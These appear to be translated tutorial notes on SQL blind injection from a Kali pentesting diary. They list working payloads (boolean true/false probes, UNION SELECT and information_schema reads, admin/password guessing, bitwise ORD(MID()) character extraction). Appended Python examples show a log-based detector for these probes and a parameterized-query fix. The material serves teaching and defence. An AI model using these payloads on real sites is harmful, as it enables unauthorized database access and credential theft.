SQL blind injection
"Introduction to SQL Injection"
Blind SQL injection: the application does not display the database's built-in error messages. Built-in error messages exist to help developers find and fix problems, but they also give away a lot of information about the system. When the programmer hides the database error and replaces it with a generic error page, an injector can no longer judge the result of an injected statement from the error text; this situation is called blind injection.
Idea: since the result cannot be judged from error information, judge it from the different results the page gives for a true and a false condition.
A. 1' and 1=1--+
B. 1' and 1=2--+ (the true condition returns the normal page; the false condition returns nothing, the page is not rendered)
If A and B behave differently, a SQL injection vulnerability exists.
Common blind-injection statements (principle: guessing data)
1' ORDER BY 5-- (test the number of columns by changing the value; once the page no longer displays, a column with that number does not exist. The leading 1 cannot be removed, because the SQL statement requires a valid value to be submitted; it does not have to be 1.)
2' union select user(), database()-- (query the user name and the database name)
2' union select 1,2--+
1' union select NULL, CONCAT_WS(CHAR(32,58,32), user(), database(), version())--+
Check all table names (# comments out the code after it):
1' and 1=0 union select null, table_name from information_schema.tables#
1' and 1=0 union select null, column_name from information_schema.columns where table_name='users'#
When reading the information_schema database is not permitted, or UNION and ORDER BY statements are rejected:
# If the condition is true the content is displayed; if false, nothing is shown. (The 1 in the statement is not fixed; it can be changed flexibly, even to characters, depending on the circumstances.)
# Use Burp Suite to automate the guessing.
1. Guess the column name
1' and user is [not] null--+ (test whether the user column exists and is empty)
2. Guess the name of the current table
1' and users.user is not null--+ (the column is already known)
3. Guess the other tables in the database
1' and (select count(*) from table)>0--+
4. List the corresponding relations
1' and users.user is not null--+
5. Guess the contents of the field
1' and user='admin
1' or user like '%a%
6. Guess the password corresponding to the account
2' or user='admin' and password='faqfoiauggvuagbymd5' (the password value is an MD5 hash; if the number is 1 it is id=1, if 2 then id=2, meaning the second account is queried)
An unusual case
When a webpage displays nothing that was extracted from the database and only the page style or layout changes:
and 1=1--+ (original page)
and 1=2--+ (a different page is shown)
# then a SQL injection vulnerability exists
Construct the statement
1' and ORD(MID(VERSION(),start,1))&1>0--+ (start is the character position; if nothing is returned, that bit of the character's ASCII code is 0; if the page returns normally, the bit is 1)
For example:
# if the page returns normally for n=32, this proves that the bit with decimal weight 32 in the binary form of the ASCII code is 1
MID function: extracts a substring from a string (syntax: MID(column_name, start, length), with the start position and the length)
ORD function: converts the character to its ASCII code (usage: ORD(string)&n, where n tests whether the corresponding binary bit of the ASCII code is 0 or 1; n = 1, 2, 4, 8, 16, 32, 64, 128). Iterating 8 times yields the full value of each ASCII code, which is then converted back to the character. Used together with VERSION(), DATABASE(), CURRENT_USER() and similar functions to query the version, the database and the current user.
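All of the probes described in these notes (the and 1=1 / and 1=2 pair, the ORD(MID(...))&n bitwise probe, UNION SELECT and information_schema reads) leave a recognisable trail in the web server's access log, which is where a defender sees them. The following Python script is an added example and not part of the original notes: it parses constructed Apache-style log lines (the client addresses, the /app/item path and the response sizes are all invented for the demonstration), URL-decodes each request, matches it against the probe patterns from the notes and scores each client. A true/false pair from the same client whose two responses differ in size is exactly the page-level oracle the blind technique depends on, so it is weighted higher.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed sample access-log lines (Apache-style, truncated after the body
# size). Addresses, the /app/item path and all sizes are invented.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /app/item?id=1 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:40 +0000] "GET /app/item?id=1%27+and+1%3D1--+ HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:41 +0000] "GET /app/item?id=1%27+and+1%3D2--+ HTTP/1.1" 200 498
203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /app/item?id=1%27+and+ORD%28MID%28VERSION%28%29%2C1%2C1%29%29%261%3E0--+ HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:46 +0000] "GET /app/item?id=1%27+and+ORD%28MID%28VERSION%28%29%2C1%2C1%29%29%262%3E0--+ HTTP/1.1" 200 498
198.51.100.7 - - [10/Oct/2023:13:56:02 +0000] "GET /app/item?id=2 HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:13:56:10 +0000] "GET /app/item?id=1%27+union+select+null%2Ctable_name+from+information_schema.tables%23 HTTP/1.1" 200 512
"""

# client - - [timestamp] "METHOD target PROTOCOL" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+)'
)

# The probe shapes named in the notes, matched on the URL-decoded request.
SIGNATURES = {
    "boolean_true": re.compile(r"\band\s+1\s*=\s*1\b", re.IGNORECASE),
    "boolean_false": re.compile(r"\band\s+1\s*=\s*2\b", re.IGNORECASE),
    "bitwise_probe": re.compile(r"\bord\s*\(\s*mid\s*\(", re.IGNORECASE),
    "union_select": re.compile(r"\bunion\s+select\b", re.IGNORECASE),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.IGNORECASE),
    "schema_read": re.compile(r"\binformation_schema\.", re.IGNORECASE),
}


def analyze(log_text):
    """Return {client_ip: {"counts", "boolean_pair", "response_differs", "score"}}."""
    per_client = defaultdict(lambda: {"counts": defaultdict(int), "bool_sizes": {}})
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        decoded = unquote_plus(m["target"])  # %27 -> ', + -> space, %23 -> #
        entry = per_client[m["ip"]]
        for name, pattern in SIGNATURES.items():
            if pattern.search(decoded):
                entry["counts"][name] += 1
                if name in ("boolean_true", "boolean_false"):
                    # remember the body size so the pair can be compared
                    entry["bool_sizes"][name] = int(m["size"])

    report = {}
    for ip, entry in per_client.items():
        counts = dict(entry["counts"])
        sizes = entry["bool_sizes"]
        pair = "boolean_true" in sizes and "boolean_false" in sizes
        report[ip] = {
            "counts": counts,
            "boolean_pair": pair,
            # a size difference between the true and false probe is the
            # page-level oracle the blind technique relies on
            "response_differs": pair and sizes["boolean_true"] != sizes["boolean_false"],
            "score": sum(counts.values()) + (3 if pair else 0),
        }
    return report


if __name__ == "__main__":
    for ip, info in sorted(analyze(SAMPLE_LOG).items(), key=lambda kv: -kv[1]["score"]):
        print(ip, info)
```

In a real deployment the same matching would be run over the decoded query string and POST body rather than on the raw request line, and the per-client score would be kept over a sliding window; a single client issuing the true/false pair followed by a run of bitwise probes against one parameter is the signature to alert on.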
Code audit
Low level (no sanitization of variables)
Medium security level
High security level
Newbie's Diary 42: Kali penetration testing, web penetration: SQL blind injection
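The "low level, no sanitization of variables" finding of the code audit comes down to the request parameter being pasted into the SQL text. The following Python example is added here and is not the audited application's code: it uses an in-memory SQLite table with invented rows and placeholder password values, shows the unsanitized lookup beside a parameterized one, and applies the notes' own true/false test (1=1 versus 1=2) to each. The vulnerable version answers the oracle; the parameterized version treats the whole string as a literal id and answers nothing either way.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table; rows and password values are invented."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, user TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "admin", "<md5 placeholder>"), (2, "guest", "<md5 placeholder>")],
    )
    return conn


def lookup_low(conn, user_id):
    """'Low' level: the request parameter is concatenated into the SQL text,
    so a quote, an AND clause and a comment marker become part of the statement."""
    sql = "SELECT user FROM users WHERE id = '" + user_id + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_parameterized(conn, user_id):
    """Fixed version: the driver binds the value; the injected text is compared
    as a literal id and never parsed as SQL."""
    sql = "SELECT user FROM users WHERE id = ?"
    return [row[0] for row in conn.execute(sql, (user_id,))]


def oracle_differs(lookup, conn):
    """The blind-injection check from the notes: does the result differ between
    the true and the false condition? True means the parameter is injectable."""
    true_probe = lookup(conn, "1' and 1=1--")
    false_probe = lookup(conn, "1' and 1=2--")
    return true_probe != false_probe


if __name__ == "__main__":
    db = make_db()
    print("low level injectable:", oracle_differs(lookup_low, db))            # True
    print("parameterized injectable:", oracle_differs(lookup_parameterized, db))  # False
```

The medium and high levels of such an audit typically add escaping or an allow-list on the parameter; parameter binding as shown in lookup_parameterized removes the problem at its root, because the database never sees the client's text as part of the query grammar.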